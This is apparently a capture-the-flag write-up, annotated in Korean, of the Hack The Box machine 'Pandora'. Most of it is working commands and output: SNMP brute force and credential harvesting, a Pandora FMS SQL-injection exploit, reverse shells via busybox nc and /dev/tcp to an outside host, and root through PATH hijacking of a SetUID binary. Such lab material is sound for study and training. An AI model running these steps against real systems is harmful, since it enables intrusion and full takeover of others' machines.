Pandora

Proof of Concept

10.129.3.150

Nmap

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
161/udp open  snmp

---

Initial Access

80 포트 웹서비스 접근 후 Footer에서 도메인 정보 발견

• Panda.HTB

/etc/hosts 파일 설정

┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.3.150	pandora.htb

Found SNMP Community String using hydra

• public

┌──(kali㉿kali)-[~/Pandora]
└─$ hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://10.129.3.150
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-19 10:45:34
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://10.129.3.150:161/
[161][snmp] host: 10.129.3.150   password: public
[STATUS] attack finished for 10.129.3.150 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-02-19 10:45:34

Enumerated SNMP data

┌──(kali㉿kali)-[~/Pandora]
└─$ snmpbulkwalk -v2c -c public 10.129.3.150 | tee snmpwalk.txt
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
<SNIP>

Found suer Daniel in SNMP data

┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 10 -B 10 -i pandora
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4

Found Daniel’s credentials in SNMP data

• daniel:HotelBabylon23

┌──(kali㉿kali)-[~/Pandora]
└─$ cat snmpwalk.txt | grep -A 5 -B 5 -i daniel
iso.3.6.1.2.1.1.1.0 = STRING: "Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (208979) 0:34:49.79
iso.3.6.1.2.1.1.4.0 = STRING: "Daniel"
iso.3.6.1.2.1.1.5.0 = STRING: "pandora"
iso.3.6.1.2.1.1.6.0 = STRING: "Mississippi"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (9) 0:00:00.09
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
--
iso.3.6.1.2.1.25.4.2.1.5.898 = ""
iso.3.6.1.2.1.25.4.2.1.5.961 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.971 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.972 = STRING: "-f"
iso.3.6.1.2.1.25.4.2.1.5.973 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
iso.3.6.1.2.1.25.4.2.1.5.975 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
iso.3.6.1.2.1.25.4.2.1.5.977 = ""
iso.3.6.1.2.1.25.4.2.1.5.990 = STRING: "-o -p -- \\u --noclear tty1 linux"
iso.3.6.1.2.1.25.4.2.1.5.1039 = ""
iso.3.6.1.2.1.25.4.2.1.5.1040 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1144 = STRING: "-u daniel -p HotelBabylon23"
iso.3.6.1.2.1.25.4.2.1.5.1347 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1598 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1791 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1822 = STRING: "-k start"
iso.3.6.1.2.1.25.4.2.1.5.1831 = STRING: "-k start"

Authenticated to SSH service using Daniel’s credentials

┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh daniel@pandora.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Thu 19 Feb 16:18:31 UTC 2026
 
  System load:           0.0
  Usage of /:            63.0% of 4.87GB
  Memory usage:          8%
  Swap usage:            0%
  Processes:             234
  Users logged in:       0
  IPv4 address for eth0: 10.129.3.150
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6938
 
  => /boot is using 91.8% of 219MB
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
daniel@pandora:~$

---

Lateral Movement (Auth as matt)

/etc/apache2/sites-enabled/pandora.conf 파일 확인 결과, Localhost에서만 접속 가능한 웹서비스 발견

daniel@pandora:/etc/apache2$ cat ./sites-enabled/pandora.conf
<VirtualHost localhost:80>
  ServerAdmin admin@panda.htb
  ServerName pandora.panda.htb
  DocumentRoot /var/www/pandora
  AssignUserID matt matt
  <Directory /var/www/pandora>
    AllowOverride All
  </Directory>
  ErrorLog /var/log/apache2/error.log
  CustomLog /var/log/apache2/access.log combined
</VirtualHost>

/etc/hosts 파일 설정

┌──(kali㉿kali)-[~/Pandora]
└─$ cat /etc/hosts
127.0.0.1	localhost
127.0.1.1	kali
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters
 
10.129.3.150	pandora.htb	pandora.panda.htb

SSH 포트포워딩 설정

┌──(kali㉿kali)-[~/Pandora]
└─$ sshpass -p 'HotelBabylon23' ssh -f -N -L 8888:127.0.0.1:80 daniel@10.129.3.150
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
 
┌──(kali㉿kali)-[~/Pandora]
└─$ ss -nltp | grep 8888
LISTEN 0      128        127.0.0.1:8888       0.0.0.0:*    users:(("ssh",pid=617053,fd=5))
LISTEN 0      128            [::1]:8888          [::]:*    users:(("ssh",pid=617053,fd=4))

http://localhost:8888로 접속 시 Pandora FMS v7.0NG.742_FIX_PERL2020 서비스가 동작중인 것을 확인

• Pandora FMS v7.0NG.742_FIX_PERL2020

해당 버전에서 SQL Injection 취약점 발견 (CVE-2021-32099)

• https://www.cve.org/CVERecord?id=CVE-2021-32099

SQL Injection 취약점을 이용하여 Admin 계정 알아낸 후, 쉘 실행까지 가능한 POC 다운로드

• https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated

┌──(kali㉿kali)-[~/Pandora]
└─$ git clone https://github.com/shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated.git
Cloning into 'Pandora_v7.0NG.742_exploit_unauthenticated'...
remote: Enumerating objects: 14, done.
remote: Counting objects: 100% (14/14), done.
remote: Compressing objects: 100% (13/13), done.
remote: Total 14 (delta 5), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (14/14), 5.07 KiB | 1.01 MiB/s, done.
Resolving deltas: 100% (5/5), done.

POC 실행

┌──(kali㉿kali)-[~/Pandora/Pandora_v7.0NG.742_exploit_unauthenticated]
└─$ ./sqlpwn.py -t 127.0.0.1:8888
URL:  http://127.0.0.1:8888/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : pc81jt52qba0dt470q1bk0ggh5
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test=
CMD >

NC 리버스쉘 리스너 실행

┌──(kali㉿kali)-[~/Pandora]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

POC 실행해서 얻은 쉘에 리버스쉘 명령어 실행

┌──(kali㉿kali)-[~/Pandora/Pandora_v7.0NG.742_exploit_unauthenticated]
└─$ ./sqlpwn.py -t 127.0.0.1:8888
URL:  http://127.0.0.1:8888/pandora_console
[+] Sending Injection Payload
[+] Requesting Session
[+] Admin Session Cookie : pc81jt52qba0dt470q1bk0ggh5
[+] Sending Payload
[+] Respose : 200
[+] Pwned :)
[+] If you want manual Control : http://127.0.0.1:8888/pandora_console/images/pwn.php?test=
CMD > busybox nc 10.10.14.111 4444 -e sh

리버스쉘 연결 성공

ng on [any] 4444 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.3.150] 55322
 
whoami
matt

Read user.txt

matt@pandora:/home/matt$ cat user.txt
cat user.txt
ddc637e35c7769a465a55a35757a43b4
matt@pandora:/home/matt$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:6b:b8 brd ff:ff:ff:ff:ff:ff
    inet 10.129.3.150/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 2441sec preferred_lft 2441sec
    inet6 dead:beef::250:56ff:feb0:6bb8/64 scope global dynamic mngtmpaddr
       valid_lft 86397sec preferred_lft 14397sec
    inet6 fe80::250:56ff:feb0:6bb8/64 scope link
       valid_lft forever preferred_lft forever

---

Privilege Escalation

현재 쉘로는 이후 작업이 정상적으로 동작하지 않으므로 새로운 쉘 접속을 위한 SSH 키 생성

┌──(kali㉿kali)-[~/Pandora]
└─$ ssh-keygen -t rsa -b 4096 -f ./id_rsa
Generating public/private rsa key pair.
Enter passphrase for "./id_rsa" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa
Your public key has been saved in ./id_rsa.pub
The key fingerprint is:
SHA256:hgDnmIfiqgJd57w57ZMTIOWwyxWyjfSMwlM0f63iLR4 kali@kali
The key's randomart image is:
+---[RSA 4096]----+
|  ..+            |
|   B=oo  .       |
|..+o+&... .      |
|..+.B.Oo .       |
| o = Bo.S        |
|o . o.o+.        |
|o     E+.o       |
|o    .+o=        |
|o     .o.o       |
+----[SHA256]-----+

파일 서버 실행

┌──(kali㉿kali)-[~/Pandora]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

생성된 id_rsa.pub 파일을 타겟 머신에 등록

matt@pandora:/home/matt$ mkdir .ssh
mkdir .ssh
matt@pandora:/home/matt$ cd .ssh
cd .ssh
matt@pandora:/home/matt/.ssh$ curl -O http://10.10.14.111:8000/id_rsa.pub
curl -O http://10.10.14.111:8000/id_rsa.pub
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   735  100   735    0     0   1472      0 --:--:-- --:--:-- --:--:--  1470
matt@pandora:/home/matt/.ssh$ mv id_rsa.pub authorized_keys
mv id_rsa.pub authorized_keys
matt@pandora:/home/matt/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys

생성된 id_rsa 파일을 이용하여 SSH 접속

┌──(kali㉿kali)-[~/Pandora]
└─$ ssh -i id_rsa matt@pandora.htb
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
  System information as of Fri 20 Feb 07:11:25 UTC 2026
 
  System load:           0.02
  Usage of /:            63.2% of 4.87GB
  Memory usage:          14%
  Swap usage:            0%
  Processes:             243
  Users logged in:       0
  IPv4 address for eth0: 10.129.3.150
  IPv6 address for eth0: dead:beef::250:56ff:feb0:6bb8
 
  => /boot is using 91.8% of 219MB
 
 
0 updates can be applied immediately.
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
matt@pandora:~$

SetUID가 설정된 바이너리 파일 열거 결과, /usr/bin/pandora_backup 바이너리 파일 발견

matt@pandora:/home/matt$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
llnd / -perm -4000 -type f -exec ls -al {} \; 2>/dev/nul
-rwsr-xr-x 1 root root 166056 Jan 19  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 31032 May 26  2021 /usr/bin/pkexec
-rwsr-xr-x 1 root root 85064 Jul 14  2021 /usr/bin/chfn
-rwsr-xr-x 1 root root 44784 Jul 14  2021 /usr/bin/newgrp
-rwsr-xr-x 1 root root 88464 Jul 14  2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39144 Jul 21  2020 /usr/bin/umount
-rwsr-x--- 1 root matt 16816 Dec  3  2021 /usr/bin/pandora_backup
-rwsr-xr-x 1 root root 68208 Jul 14  2021 /usr/bin/passwd
-rwsr-xr-x 1 root root 55528 Jul 21  2020 /usr/bin/mount
-rwsr-xr-x 1 root root 67816 Jul 21  2020 /usr/bin/su
-rwsr-sr-x 1 daemon daemon 55560 Nov 12  2018 /usr/bin/at
-rwsr-xr-x 1 root root 39144 Mar  7  2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 53040 Jul 14  2021 /usr/bin/chsh
-rwsr-xr-x 1 root root 473576 Jul 23  2021 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 51344 Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14488 Jul  8  2019 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 22840 May 26  2021 /usr/lib/policykit-1/polkit-agent-helper-1

pandora_backup 바이너리에서 파일 백업을 위해 tar 명령어를 사용하는 것을 확인

┌──(kali㉿kali)-[~/Pandora]
└─$ strings pandora_backup
/lib64/ld-linux-x86-64.so.2
puts
setreuid
system
getuid
geteuid
__cxa_finalize
__libc_start_main
libc.so.6
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
u/UH
[]A\A]A^A_
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
tar -cvf /root/.backup/pandora-backup.tar.gz /var/www/pandora/pandora_console/*

/tmp 디렉토리에 리버스 쉘 연결을 시도하는 tar 쉘 파일 생성

matt@pandora:/tmp$ cat /tmp/tar
#!/bin/bash
bash -c 'sh -i >& /dev/tcp/10.10.14.111/4444 0>&1'
matt@pandora:/tmp$ chmod a+x tar

리버스쉘 리스너 실행

┌──(kali㉿kali)-[~/Pandora]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...

/tmp 디렉토리를 PATH에 추가 후 /usr/bin/pandora_backup 바이너리 실행

matt@pandora:/tmp$ export PATH=/tmp:$PATH
matt@pandora:/tmp$ /usr/bin/pandora_backup
PandoraFMS Backup Utility
Now attempting to backup PandoraFMS client
^C^CBackup failed!
Check your permissions!

root 권한으로 리버스쉘 연결 성공

┌──(kali㉿kali)-[~/Pandora]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.111] from (UNKNOWN) [10.129.3.150] 34108
# whoami
root

Read root.txt

root@pandora:/root# cat root.txt
cat root.txt
71ffb89650d34e9edf81de26ab443c56
root@pandora:/root# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b0:6b:b8 brd ff:ff:ff:ff:ff:ff
    inet 10.129.3.150/16 brd 10.129.255.255 scope global dynamic eth0
       valid_lft 3424sec preferred_lft 3424sec
    inet6 dead:beef::250:56ff:feb0:6bb8/64 scope global dynamic mngtmpaddr
       valid_lft 86398sec preferred_lft 14398sec
    inet6 fe80::250:56ff:feb0:6bb8/64 scope link
       valid_lft forever preferred_lft forever